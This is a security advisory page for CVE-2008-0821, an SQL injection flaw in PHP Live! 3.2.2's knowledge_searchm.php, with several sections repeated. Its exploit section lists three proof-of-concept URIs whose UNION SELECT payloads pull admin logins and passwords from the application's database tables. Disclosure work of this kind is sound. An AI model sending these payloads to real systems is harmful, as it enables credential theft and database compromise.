OSI Codes PHP Live! 'knowledge_searchm.php' SQL Injection Vulnerability
BID:27807
Info
OSI Codes PHP Live! 'knowledge_searchm.php' SQL Injection Vulnerability
| Bugtraq ID: | 27807 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0821 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2008 12:00AM |
| Updated: | May 07 2015 05:32PM |
| Credit: | Xar discovered this vulnerability. |
| Vulnerable: |
OSI Codes Inc. PHPLive! 3.2.2 |
| Not Vulnerable: | |
Discussion
OSI Codes PHP Live! 'knowledge_searchm.php' SQL Injection Vulnerability
PHP Live! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects PHP Live! 3.2.2 and prior versions.
PHP Live! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects PHP Live! 3.2.2 and prior versions.
Exploit / POC
OSI Codes PHP Live! 'knowledge_searchm.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/admin/traffic/knowledge_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a
http://www.example.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_asp%20limit%200,1
http://www.example.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_admin%20limit%200,1
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/admin/traffic/knowledge_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a
http://www.example.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_asp%20limit%200,1
http://www.example.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_admin%20limit%200,1
Solution / Fix
OSI Codes PHP Live! 'knowledge_searchm.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
OSI Codes PHP Live! 'knowledge_searchm.php' SQL Injection Vulnerability
References:
References:
- PHP LIVE! Homepage (OSI Codes Inc.)